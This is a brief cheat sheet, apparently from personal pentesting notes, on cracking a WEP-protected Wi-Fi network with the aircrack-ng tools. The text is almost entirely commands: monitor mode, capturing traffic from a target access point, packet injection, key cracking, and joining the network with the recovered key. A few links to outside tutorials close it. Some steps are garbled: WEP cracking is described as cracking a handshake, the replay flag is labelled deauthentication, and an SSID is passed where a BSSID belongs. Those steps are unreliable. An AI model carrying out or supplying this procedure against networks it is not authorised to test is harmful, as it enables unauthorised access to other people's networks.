Attack WEP

Ref:

  1. Start Monitor mode:

# start monitor mode
sudo airmon-ng start wlan0

# stop monitor mode / wanna connect the wifi
sudo airmon-ng stop wlan0


# filter wps encryption
sudo airodump-ng wlan0mon --wps
  1. Start capture hash of the handshake:

sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0

In parallel run deauthentication attack:

sudo aireplay-ng -3 -b $NAME_OF_SSID -h $STATION_MAC wlan0
  1. crack the handshake

sudo aircrack-ng capture_WEP.cap


After cracking, you can directly connect the WiFi by the UI or terminal below:

Make sure stop the monitor mode before connecting

sudo iwconfig wlan0 essid <target SSID Name> key <hexKey>

# refresh the DHCP Configuration
sudo dhclient wlan0

Stuck?

--> https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html

http://www.onnocenter.or.id/wiki/index.php/Attacks:_WEP_Cracking,_WPA_Handshake_Capture

https://www.youtube.com/watch?v=e667NA3aPqY

Last updated